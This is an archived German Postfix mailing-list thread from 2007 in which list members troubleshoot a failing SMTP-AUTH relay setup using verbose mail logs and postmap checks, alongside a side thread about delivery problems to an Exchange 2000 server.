unknown[193.158.37.xxx] > Nov 30 15:41:38 localhost postfix/bounce[4163]: 525102B6CB: sender > non-delivery notification: 607FC2B6CC > Nov 30 15:41:38 localhost postfix/qmgr[4133]: 525102B6CB: removed > Nov 30 15:41:38 localhost postfix/local[4164]: 607FC2B6CC: > to=, relay=local, delay=0.05, > delays=0.01/0.02/0/0.02, dsn=2.0.0, status=sent (delivered to command: > procmail -a "$EXTENSION") > Nov 30 15:41:38 localhost postfix/qmgr[4133]: 607FC2B6CC: removed > > Lokal scheint es weitergegangen zu sein, aber am Ziel angekommen ist die > Mail leider nicht. Schau mal nach ob du so was wie die obigen Zeilen findest, schau in Outlook nach ob da wirklich auth eingetragen ist für den Postausgangsserver > > Ich wette 2 Cent > > auf fehlende sasl2-modules > Sollst Du bekommen, wenn es stimmt! ;) > , scheint ja Debian zu sein, oder? > Das ist ein Volltreffer! ;) Es ist etch. > Gruss, > Michael Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From cite at incertum.net Fri Nov 30 16:00:02 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 30 Nov 2007 16:00:02 +0100 Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> <20071130141958.GM12941@mail.incertum.net> <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> Message-ID: <20071130150002.GO12941@mail.incertum.net> * pinguin at tuxolino.net wrote: > Nov 30 15:41:38 localhost postfix/smtp[4162]: > mail.tuxolino.net[89.246.255.36]: QUIT Weißt Du, man soll ja eigentlich keine Leute auf öffentlichen Mailinglisten beschimpfen, sie kratzen oder ihnen Tiernamen geben. Aber die traumwandlerische Sicherheit, mit der Du den relevanten Teil des Logs weggeschnitten hast, ist schon beeindruckend. Also, Du Hängebauchschwein, fühl Dich beschimpft und gekratzt ;-) Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 Sie spielen zuviel Counterstrike, wenn Sie... ...große, offene Plätze nur noch hüpfend und im Zickzack überqueren. From tv at solnet.ch Fri Nov 30 16:04:00 2007 From: tv at solnet.ch (Thomas Vogt) Date: Fri, 30 Nov 2007 16:04:00 +0100 Subject: [Postfixbuch-users] Hat Postfix probleme mit Exchange Server? "lost connection with "while sending MAIL FROM) In-Reply-To: <475022F8.8030807@linuxrocks.dyndns.org> References: <47501D1B.7080903@solnet.ch> <20071130143447.GL32622@charite.de> <475022F8.8030807@linuxrocks.dyndns.org> Message-ID: <47502660.70608@solnet.ch> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hallo Matthias Haegele schrieb: > Ralf Hildebrandt schrieb: >> * Thomas Vogt : >>> Hallo >>> >>> Sind Probleme bekannt im Zusammenspiel zwischen Postfix und Exchange 2000? >> Nö. >> >>> Fehler: >>> Nov 28 13:17:56 mail04 postfix/smtp[22729]: 355AD72F49: >>> to=, relay=mail.xxxx.xx[1.1.1.1.]:25, >>> delay=1, delays=1/0.03/0.24/0.22, dsn=4.4.2, status=deferred >>> (lost connection with mail.xxxx.xx[1.1.1.1] while sending MAIL >>> FROM) >> Was loggt der Exchange? >> >>> einen Exchange Server nicht. Da jedoch Sendmail ohne Probleme Emails >>> senden kann, kann es weniger am Server selber liegen. >> Das denkst Du. Exchange 2000 hat soviele spektakuläre Fehler. >> >> http://www.arschkrebs.de/postfix/broken_microsoft.shtml >> wäre einen Versuch wert, auch mal ein TCPDUMP der Sitzung. > > Trifft das "nur" auf Exchange 2000 zu oder haben neuere Exchange > Versionen immer noch diese Probleme?. In diesem Fall nur auf den Exchange 2000 Server des Empfaengers. Debugen ist nicht ganz so einfach, da die Gegenstelle nicht sehr viel know how hat. Neuere Exhcnages haben scheinbar keon Problem. Wir senden mehrere Millionen Emails am Tag und haben eigentlich keine Probleme mit Kunden die Exchange benutzen. Ich vermute schon, dass es ein Exchange Bug ist. Mein Hoffnung war halt, dass jemand vielleicht schonmal dasselbe Problem hatte und weiss was man bei Exchange klicken muss :) Gruss Tom -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHUCZgGCwkYTI5tyARApvnAJwO1oXhRA9i5ZsWVd2uZB+rkEf3WQCggN7Z 0sVJobc3g+yFXtkc1X1HKZA= =xxED -----END PGP SIGNATURE----- From tv at solnet.ch Fri Nov 30 16:06:59 2007 From: tv at solnet.ch (Thomas Vogt) Date: Fri, 30 Nov 2007 16:06:59 +0100 Subject: [Postfixbuch-users] Hat Postfix probleme mit Exchange Server? "lost connection with "while sending MAIL FROM) In-Reply-To: <475020CE.4090209@linuxrocks.dyndns.org> References: <47501D1B.7080903@solnet.ch> <475020CE.4090209@linuxrocks.dyndns.org> Message-ID: <47502713.6080607@solnet.ch> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hallo Matthias Haegele schrieb: > Thomas Vogt schrieb: > >> Hallo >> >> Sind Probleme bekannt im Zusammenspiel zwischen Postfix und Exchange 2000? > > Gegenfrage: Gibt es irgendwas das keine Probleme mit Exchange hat? Noe :) > > Hast du mal eine Mail händisch mittels telnet z.B. auf dem "gegnerischen > Server" erfolgreich abgesetzt, > vielleicht kann dir der "andere Administrator" beim Debuggen > weiterhelfen (hmm es ist Exchange ...) Telnet geht. Ich hab dem Betreiber gesagt er soll seine Firewall nochmals checken und den Exchange Server. Mir reichts, wenn das Problem nicht auf Postfix Seite liegt. Gruss Tom - -- * Thomas Vogt UNIX System Engineer - SolNet AS9044 - PGP-3239B720 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHUCcTGCwkYTI5tyARAj1HAJ93thP4CvS0Z1QKjPo328UwZhco1gCeLjH2 KDLfBmSuHtDBa5QgWEs1AOI= =Xj6F -----END PGP SIGNATURE----- From pinguin at tuxolino.net Fri Nov 30 16:13:22 2007 From: pinguin at tuxolino.net (pinguin at tuxolino.net) Date: Fri, 30 Nov 2007 16:13:22 +0100 (CET) Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <000d01c83361$8a93b780$0565a8c0@uwe> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net><20071130141958.GM12941@mail.incertum.net> <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> <000d01c83361$8a93b780$0565a8c0@uwe> Message-ID: <37926.87.122.137.152.1196435602.squirrel@www.tuxolino.net> > Also ich vermisse solche Zeilen oder ähnliche im Log > > Nov 30 15:46:56 s1 postfix/smtpd[1000]: connect from > unknown[193.158.37.xxx] > Nov 30 15:46:56 s1 postfix/smtpd[1000]: setting up TLS connection from > unknown[193.158.37.xxx] > Nov 30 15:46:56 s1 postfix/smtpd[1000]: TLS connection established from > unknown[193.158.37.226]: TLSv1 with cipher RC4-MD5 (128/128 bits) > Nov 30 15:46:56 s1 postfix/smtpd[1000]: 40C0482C2F1: > client=unknown[193.158.37.xxx], > sasl_method=LOGIN, sasl_username=halligalli at fblan.de > Nov 30 15:46:56 s1 postfix/cleanup[1003]: 40C0482C2F1: > message-id=<000c01c8335f$d661ea30$0565a8c0 at meiner> > Nov 30 15:46:56 s1 postfix/qmgr[4589]: 40C0482C2F1: > from=, size=3158, > nrcpt=1 (queue active) > Nov 30 15:46:58 s1 postfix/smtpd[1000]: disconnect from > unknown[193.158.37.xxx] > >> Nov 30 15:41:38 localhost postfix/bounce[4163]: 525102B6CB: sender >> non-delivery notification: 607FC2B6CC >> Nov 30 15:41:38 localhost postfix/qmgr[4133]: 525102B6CB: removed >> Nov 30 15:41:38 localhost postfix/local[4164]: 607FC2B6CC: >> to=, relay=local, delay=0.05, >> delays=0.01/0.02/0/0.02, dsn=2.0.0, status=sent (delivered to command: >> procmail -a "$EXTENSION") >> Nov 30 15:41:38 localhost postfix/qmgr[4133]: 607FC2B6CC: removed > Schau mal nach ob du so was wie die obigen Zeilen findest, > schau in Outlook nach ob da wirklich auth eingetragen ist für den > Postausgangsserver Ja, hier: ov 30 15:41:38 localhost postfix/smtp[4162]: connect to subsystem private/bounce Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr nrequest = 0 Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr flags = 0 Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr queue_id = 525102B6CB Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr original_recipient = mgschmidt at foni.net Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr recipient = mgschmidt at foni.net Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr offset = 193 Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr dsn_orig_rcpt = Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr notify_flags = 0 Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr offset = 193 Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr dsn_orig_rcpt = Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr notify_flags = 0 Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr status = 5.7.1 Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr diag_type = smtp Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr diag_text = 550 5.7.1 ... Relaying denied. Proper authentication required. Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr mta_type = dns Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr mta_mname = mail.tuxolin o.net Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr action = failed Nov 30 15:41:38 localhost postfix/smtp[4162]: send attr reason = host mail.tuxol ino.net[89.246.255.36] said: 550 5.7.1 ... Relaying denied. Proper authentication required. (in reply to RCPT TO command) Nov 30 15:41:38 localhost postfix/smtp[4162]: private/bounce socket: wanted attr ibute: status Nov 30 15:41:38 localhost postfix/smtp[4162]: input attribute name: status Nov 30 15:41:38 localhost postfix/smtp[4162]: input attribute value: 0 Nov 30 15:41:38 localhost postfix/smtp[4162]: private/bounce socket: wanted attr ibute: (list terminator) Nov 30 15:41:38 localhost postfix/smtp[4162]: input attribute name: (end) Gruss, Michael From pinguin at tuxolino.net Fri Nov 30 16:15:09 2007 From: pinguin at tuxolino.net (pinguin at tuxolino.net) Date: Fri, 30 Nov 2007 16:15:09 +0100 (CET) Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <20071130150002.GO12941@mail.incertum.net> References: <34044.87.122.137.152.1196430705.squirrel@www.tuxolino.net> <20071130141958.GM12941@mail.incertum.net> <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> <20071130150002.GO12941@mail.incertum.net> Message-ID: <37928.87.122.137.152.1196435709.squirrel@www.tuxolino.net> > * pinguin at tuxolino.net wrote: >> Nov 30 15:41:38 localhost postfix/smtp[4162]: > >> mail.tuxolino.net[89.246.255.36]: QUIT > > Weißt Du, man soll ja eigentlich keine Leute auf öffentlichen > Mailinglisten beschimpfen, sie kratzen oder ihnen Tiernamen geben. > Aber die traumwandlerische Sicherheit, mit der Du den relevanten Teil > des Logs weggeschnitten hast, ist schon beeindruckend. > > Also, Du Hängebauchschwein, fühl Dich beschimpft und gekratzt ;-) Tut mir echt leid! War schliesslich keine Absicht, sondern Unkenntnis! Gruss, Michael From tv at solnet.ch Fri Nov 30 16:15:49 2007 From: tv at solnet.ch (Thomas Vogt) Date: Fri, 30 Nov 2007 16:15:49 +0100 Subject: [Postfixbuch-users] Hat Postfix probleme mit Exchange Server? "lost connection with "while sending MAIL FROM) In-Reply-To: <20071130143447.GL32622@charite.de> References: <47501D1B.7080903@solnet.ch> <20071130143447.GL32622@charite.de> Message-ID: <47502925.7000401@solnet.ch> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hallo Ralf Hildebrandt schrieb: > * Thomas Vogt : >> Hallo >> >> Sind Probleme bekannt im Zusammenspiel zwischen Postfix und Exchange 2000? > > Nö. > >> Fehler: >> Nov 28 13:17:56 mail04 postfix/smtp[22729]: 355AD72F49: >> to=, relay=mail.xxxx.xx[1.1.1.1.]:25, >> delay=1, delays=1/0.03/0.24/0.22, dsn=4.4.2, status=deferred >> (lost connection with mail.xxxx.xx[1.1.1.1] while sending MAIL >> FROM) > > Was loggt der Exchange? > >> einen Exchange Server nicht. Da jedoch Sendmail ohne Probleme Emails >> senden kann, kann es weniger am Server selber liegen. > > Das denkst Du. Exchange 2000 hat soviele spektakuläre Fehler. Ich meinte natuerlich, dass es NICHT am Postfix Server liegt sondern eher am Exchange Server > > http://www.arschkrebs.de/postfix/broken_microsoft.shtml > wäre einen Versuch wert, auch mal ein TCPDUMP der Sitzung. Danke. Das wars. Gruss Tom - -- * Thomas Vogt UNIX System Engineer - SolNet AS9044 - PGP-3239B720 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (FreeBSD) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHUCklGCwkYTI5tyARAvyQAJ0TjqFL1iNiYgRtbcSJXe7aFB+iWQCfZc8+ Sy3lfwpYeSLq4wA0dy5/y7w= =iVFD -----END PGP SIGNATURE----- From mhaegele at linuxrocks.dyndns.org Fri Nov 30 16:17:07 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Fri, 30 Nov 2007 16:17:07 +0100 Subject: [Postfixbuch-users] Hat Postfix probleme mit Exchange Server? "lost connection with "while sending MAIL FROM) In-Reply-To: <47502660.70608@solnet.ch> References: <47501D1B.7080903@solnet.ch> <20071130143447.GL32622@charite.de> <475022F8.8030807@linuxrocks.dyndns.org> <47502660.70608@solnet.ch> Message-ID: <47502973.8070800@linuxrocks.dyndns.org> Thomas Vogt schrieb: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hallo > > Matthias Haegele schrieb: >> Ralf Hildebrandt schrieb: >>> * Thomas Vogt : >>>> Hallo >>>> >>>> Sind Probleme bekannt im Zusammenspiel zwischen Postfix und Exchange 2000? >>> Nö. >>> >>>> Fehler: >>>> Nov 28 13:17:56 mail04 postfix/smtp[22729]: 355AD72F49: >>>> to=, relay=mail.xxxx.xx[1.1.1.1.]:25, >>>> delay=1, delays=1/0.03/0.24/0.22, dsn=4.4.2, status=deferred >>>> (lost connection with mail.xxxx.xx[1.1.1.1] while sending MAIL >>>> FROM) >>> Was loggt der Exchange? >>> >>>> einen Exchange Server nicht. Da jedoch Sendmail ohne Probleme Emails >>>> senden kann, kann es weniger am Server selber liegen. >>> Das denkst Du. Exchange 2000 hat soviele spektakuläre Fehler. >>> >>> http://www.arschkrebs.de/postfix/broken_microsoft.shtml >>> wäre einen Versuch wert, auch mal ein TCPDUMP der Sitzung. >> Trifft das "nur" auf Exchange 2000 zu oder haben neuere Exchange >> Versionen immer noch diese Probleme?. > > In diesem Fall nur auf den Exchange 2000 Server des Empfaengers. Debugen > ist nicht ganz so einfach, da die Gegenstelle nicht sehr viel know how hat. Was will man erwarten bei jemand der einen "Exchange direkt ins Internet erreichbar stellt?". btw: Hab grad mal spasseshalber das Log auf dem SMTP Protokoll aktiviert (das Standardmässig deaktiviert ist, toll nicht) bei einem Exchange 2003 aktiviert, irgendwo ist das Log nichtssagend, weiss allerdings nicht ob das bei einem 2000er auch so ist ... > Neuere Exhcnages haben scheinbar keon Problem. Wir senden mehrere > Millionen Emails am Tag und haben eigentlich keine Probleme mit Kunden > die Exchange benutzen. > > Ich vermute schon, dass es ein Exchange Bug ist. Mein Hoffnung war halt, > dass jemand vielleicht schonmal dasselbe Problem hatte und weiss was man > bei Exchange klicken muss :) > Gruss > Tom -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From cite at incertum.net Fri Nov 30 16:17:05 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 30 Nov 2007 16:17:05 +0100 Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <37926.87.122.137.152.1196435602.squirrel@www.tuxolino.net> References: <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> <000d01c83361$8a93b780$0565a8c0@uwe> <37926.87.122.137.152.1196435602.squirrel@www.tuxolino.net> Message-ID: <20071130151705.GP12941@mail.incertum.net> * pinguin at tuxolino.net wrote: > ov 30 15:41:38 localhost postfix/smtp[4162]: connect to subsystem > private/bounce Das ist leider immer noch zu spät. Noch früher, noch mehr, den ganzen Dialog! BTW, hast Du postmap auf Deine sasl_passwd-Map durchgeführt, nachdem Du die eckigen Klammern ergänzt hast? Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #296: Human Interface Parser - Gesichtskontrolle (Andre Schöngraf) From pinguin at tuxolino.net Fri Nov 30 16:31:20 2007 From: pinguin at tuxolino.net (pinguin at tuxolino.net) Date: Fri, 30 Nov 2007 16:31:20 +0100 (CET) Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <20071130151705.GP12941@mail.incertum.net> References: <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> <000d01c83361$8a93b780$0565a8c0@uwe> <37926.87.122.137.152.1196435602.squirrel@www.tuxolino.net> <20071130151705.GP12941@mail.incertum.net> Message-ID: <35737.87.122.137.152.1196436680.squirrel@www.tuxolino.net> > Das ist leider immer noch zu spät. Noch früher, noch mehr, den ganzen > Dialog! Tut mir wirklich leid! Aber jetzt kommt der komplette Dialog einer Mail nach dem postmap: Nov 30 16:25:03 localhost postfix/pickup[4132]: 6780C2B6CB: uid=1000 from= Nov 30 16:25:03 localhost postfix/cleanup[4268]: 6780C2B6CB: message-id=<2007113 0152503.GA4260 at tuxolino.net> Nov 30 16:25:03 localhost postfix/qmgr[4133]: 6780C2B6CB: from=, size=430, nrcpt=1 (queue active) Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 220 ens34fl.versatel.de ESMTP Sendmail 8.12.11/8.12.11; Fri, 30 Nov 2007 16:25 :03 +0100 Nov 30 16:25:03 localhost postfix/smtp[4270]: > mail.tuxolino.net[89.246.255.36] : EHLO localhost Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 250-ens34fl.versatel.de Hello i577A8998.versanet.de [87.122.137.152], pleased to meet you Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 250-ENHANCEDSTATUSCODES Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 250-PIPELINING Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 250-8BITMIME Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 250-SIZE 52428800 Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 250-DSN Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 250-ETRN Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 250-AUTH LOGIN PLAIN Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 250-DELIVERBY Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 250 HELP Nov 30 16:25:03 localhost postfix/smtp[4270]: server features: 0x902f size 52428 800 Nov 30 16:25:03 localhost postfix/smtp[4270]: Using ESMTP PIPELINING, TCP send b uffer size is 4096 Nov 30 16:25:03 localhost postfix/smtp[4270]: maps_find: smtp_sasl_passwd: mail. tuxolino.net: not found Nov 30 16:25:03 localhost postfix/smtp[4270]: maps_find: smtp_sasl_passwd: [mail .tuxolino.net]: not found Nov 30 16:25:03 localhost postfix/smtp[4270]: smtp_sasl_passwd_lookup: no auth i nfo found (sender=`michael at tuxolino.net', host=`mail.tuxolino.net') Nov 30 16:25:03 localhost postfix/smtp[4270]: > mail.tuxolino.net[89.246.255.36] : MAIL FROM: SIZE=430 Nov 30 16:25:03 localhost postfix/smtp[4270]: > mail.tuxolino.net[89.246.255.36] : RCPT TO: ORCPT=rfc822;mgschmidt at foni.net Nov 30 16:25:03 localhost postfix/smtp[4270]: > mail.tuxolino.net[89.246.255.36] : DATA Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 250 2.1.0 ... Sender ok Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 550 5.7.1 ... Relaying denied. Proper authentication requi red. Nov 30 16:25:03 localhost postfix/smtp[4270]: connect to subsystem private/bounc e Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr nrequest = 0 Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr flags = 0 Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr queue_id = 6780C2B6CB Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr original_recipient = mgs chmidt at foni.net Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr recipient = mgschmidt at fo ni.net Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr offset = 193 Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr dsn_orig_rcpt = Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr notify_flags = 0 Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr status = 5.7.1 Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr diag_type = smtp Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr diag_text = 550 5.7.1 ... Relaying denied. Proper authentication required. Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr mta_type = dns Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr mta_mname = mail.tuxolin o.net Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr action = failed Nov 30 16:25:03 localhost postfix/smtp[4270]: send attr reason = host mail.tuxol ino.net[89.246.255.36] said: 550 5.7.1 ... Relaying denied. Proper authentication required. (in reply to RCPT TO command) Nov 30 16:25:03 localhost postfix/smtp[4270]: private/bounce socket: wanted attr ibute: status Nov 30 16:25:03 localhost postfix/smtp[4270]: input attribute name: status Nov 30 16:25:03 localhost postfix/smtp[4270]: input attribute value: 0 Nov 30 16:25:03 localhost postfix/smtp[4270]: private/bounce socket: wanted attr ibute: (list terminator) Nov 30 16:25:03 localhost postfix/smtp[4270]: input attribute name: (end) Nov 30 16:25:03 localhost postfix/smtp[4270]: 6780C2B6CB: to=, relay=mail.tuxolino.net[89.246.255.36]:25, delay=0.58, delays=0.11/0.04/0.37/ 0.06, dsn=5.7.1, status=bounced (host mail.tuxolino.net[89.246.255.36] said: 550 5.7.1 ... Relaying denied. Proper authentication required. (in reply to RCPT TO command)) Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 503 5.0.0 Need RCPT (recipient) Nov 30 16:25:03 localhost postfix/smtp[4270]: > mail.tuxolino.net[89.246.255.36] : RSET Nov 30 16:25:03 localhost postfix/smtp[4270]: > mail.tuxolino.net[89.246.255.36] : QUIT Nov 30 16:25:03 localhost postfix/smtp[4270]: < mail.tuxolino.net[89.246.255.36] : 250 2.0.0 Reset state Nov 30 16:25:03 localhost postfix/smtp[4270]: name_mask: resource Nov 30 16:25:03 localhost postfix/smtp[4270]: name_mask: software Nov 30 16:25:03 localhost postfix/cleanup[4268]: EE4332B6CC: message-id=<2007113 0152503.EE4332B6CC at localhost> Nov 30 16:25:03 localhost postfix/qmgr[4133]: EE4332B6CC: from=<>, size=2291, nr cpt=1 (queue active) Nov 30 16:25:03 localhost postfix/bounce[4271]: 6780C2B6CB: sender non-delivery notification: EE4332B6CC Nov 30 16:25:03 localhost postfix/qmgr[4133]: 6780C2B6CB: removed Nov 30 16:25:04 localhost postfix/local[4272]: EE4332B6CC: to=, relay=local, delay=0.06, delays=0.01/0.03/0/0.02, dsn=2.0.0, status=sent ( delivered to command: procmail -a "$EXTENSION") Nov 30 16:25:04 localhost postfix/qmgr[4133]: EE4332B6CC: removed So, das ist jetzt mal ein kompletter Log fuer eine abgesandte Mail. Ciao, Michael From mhaegele at linuxrocks.dyndns.org Fri Nov 30 16:34:06 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Fri, 30 Nov 2007 16:34:06 +0100 Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <20071130151705.GP12941@mail.incertum.net> References: <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> <000d01c83361$8a93b780$0565a8c0@uwe> <37926.87.122.137.152.1196435602.squirrel@www.tuxolino.net> <20071130151705.GP12941@mail.incertum.net> Message-ID: <47502D6E.30508@linuxrocks.dyndns.org> Stefan Förster schrieb: > * pinguin at tuxolino.net wrote: >> ov 30 15:41:38 localhost postfix/smtp[4162]: connect to subsystem >> private/bounce > > Das ist leider immer noch zu spät. Noch früher, noch mehr, den ganzen > Dialog! > > BTW, hast Du postmap auf Deine sasl_passwd-Map durchgeführt, nachdem > Du die eckigen Klammern ergänzt hast? Falls man die Mailingliste nicht mit "hunderten Zeilen Logs überfrachten" will (weil man z.B. nicht weiss was evtl. relevant ist) könnte man ja auch: "paste bin" Dienste wie: pastebin.com nutzen und nur den Link hier posten ... just my 2 cent. > Ciao > Stefan -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From pinguin at tuxolino.net Fri Nov 30 16:38:19 2007 From: pinguin at tuxolino.net (pinguin at tuxolino.net) Date: Fri, 30 Nov 2007 16:38:19 +0100 (CET) Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <47502D6E.30508@linuxrocks.dyndns.org> References: <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> <000d01c83361$8a93b780$0565a8c0@uwe> <37926.87.122.137.152.1196435602.squirrel@www.tuxolino.net> <20071130151705.GP12941@mail.incertum.net> <47502D6E.30508@linuxrocks.dyndns.org> Message-ID: <38917.87.122.137.152.1196437099.squirrel@www.tuxolino.net> > Falls man die Mailingliste nicht mit "hunderten Zeilen Logs > überfrachten" will (weil man z.B. nicht weiss was evtl. relevant ist) Genau das ist mein Problem ;) > könnte man ja auch: > > "paste bin" Dienste wie: > pastebin.com nutzen und nur den Link hier posten ... Der Hinweis ist sehr gut. Ich habe bis eben noch nie etwas davon gehoert, aber werde es mit den kommenden posts so machen. > > just my 2 cent. Wohin soll ich sie ueberweisen? ;) Welches Modul fehlt? Ciao, Michael From cite at incertum.net Fri Nov 30 16:48:10 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Fri, 30 Nov 2007 16:48:10 +0100 Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <35737.87.122.137.152.1196436680.squirrel@www.tuxolino.net> References: <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> <000d01c83361$8a93b780$0565a8c0@uwe> <37926.87.122.137.152.1196435602.squirrel@www.tuxolino.net> <20071130151705.GP12941@mail.incertum.net> <35737.87.122.137.152.1196436680.squirrel@www.tuxolino.net> Message-ID: <20071130154810.GQ12941@mail.incertum.net> Trinkt hier jemand Holsten? Irgendwer? * pinguin at tuxolino.net wrote: > Nov 30 16:25:03 localhost postfix/smtp[4270]: maps_find: smtp_sasl_passwd: mail.tuxolino.net: not found > Nov 30 16:25:03 localhost postfix/smtp[4270]: maps_find: smtp_sasl_passwd: [mail.tuxolino.net]: not found > Nov 30 16:25:03 localhost postfix/smtp[4270]: smtp_sasl_passwd_lookup: no auth info found (sender=`michael at tuxolino.net', host=`mail.tuxolino.net') Ahjo, in der /etc/postfix/sasl_passwd (ich nehme an, die hieß bei Dir so, wenn nicht, dann bitte im Folgenden anpassen) wird keine Information für eine Authentifizierung am Host mail.tuxolino.net gefunden. Da stellen sich dann die folgenden drei Fragen: 1. Was steht denn genau in dieser Dati (und ja, Du darfst Benutzername und Paßwort gerne unkenntlich machen)? 2. Wurde die Datei korrekt mit postmap sasl_passwd in eine hash-Datei überführt, i.e., gibt es sasl_passwd.db? 3. Was sagt denn ein "postmap -v -q mail.tuxolino.net hash:sasl_passwd"? (Das "-v" kann man im ersten Durchgang auch gerne mal weglassen). Ich glaube, mit diesen Hinweisen und dem Verweis auf http://www.postfix.org/SASL_README.html#client_sasl bist Du bestimmt in der Lage, das alleine hinzukriegen. Ich suche jetzt mal Holsten. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #223: Open Source - Eigentlich finde ich ja die Idee von Open Source richtig gut. Aber bei meinen Programmen? (Frank Wieduwilt) From mhaegele at linuxrocks.dyndns.org Fri Nov 30 16:58:20 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Fri, 30 Nov 2007 16:58:20 +0100 Subject: [Postfixbuch-users] smtp-Auth In-Reply-To: <20071130154810.GQ12941@mail.incertum.net> References: <57107.87.122.137.152.1196434163.squirrel@www.tuxolino.net> <000d01c83361$8a93b780$0565a8c0@uwe> <37926.87.122.137.152.1196435602.squirrel@www.tuxolino.net> <20071130151705.GP12941@mail.incertum.net> <35737.87.122.137.152.1196436680.squirrel@www.tuxolino.net> <20071130154810.GQ12941@mail.incertum.net> Message-ID: <4750331C.4070705@linuxrocks.dyndns.org> Stefan Förster schrieb: > Trinkt hier jemand Holsten? Irgendwer? > > * pinguin at tuxolino.net wrote: >> Nov 30 16:25:03 localhost postfix/smtp[4270]: maps_find: smtp_sasl_passwd: mail.tuxolino.net: not found >> Nov 30 16:25:03 localhost postfix/smtp[4270]: maps_find: smtp_sasl_passwd: 